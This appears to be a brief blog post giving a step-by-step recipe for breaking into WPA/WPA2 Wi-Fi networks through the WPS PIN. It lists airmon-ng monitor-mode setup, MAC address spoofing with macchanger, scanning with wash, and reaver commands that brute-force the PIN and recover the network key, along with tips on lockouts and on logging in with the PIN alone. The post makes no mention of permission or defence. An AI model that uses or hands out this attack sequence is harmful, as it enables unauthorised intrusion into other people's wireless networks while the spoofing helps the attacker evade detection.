Need:
-access point vulnerable on WPS attack
Hacking Wireless (WPA/WPA2) with WPS
Need:
-access point vulnerable on WPS attack
TERMINAL No.1
airmon-ng
airmon-ng start [interface]
ifconfig [interface] down
macchanger -m 00:11:22:33:44:55 [interface]
ifconfig [mon0] down
macchanger -m 00:11:22:33:44:55 [mon0]
ifconfig [interface] up
ifconfig [mon0] up
wash -i [mon0]
“Vulnerable: WPS Locked: No”
reaver -i [mon0] -c [Channel number] -b [BSSID] -S -L -vv
“Wait 2-10 hours”
Only PIN without WPA key:
reaver -i [mon0] -c [Channel number] -b [BSSID] -p [PIN key] -vv
Some AP locks WPS when you try wrong key to many times. Only hard-reset helps.
Ignore any errors if it keeps going.
You can login into Wifi with PIN only. So you needn’t to crack WPA key.
0 comments:
Post a Comment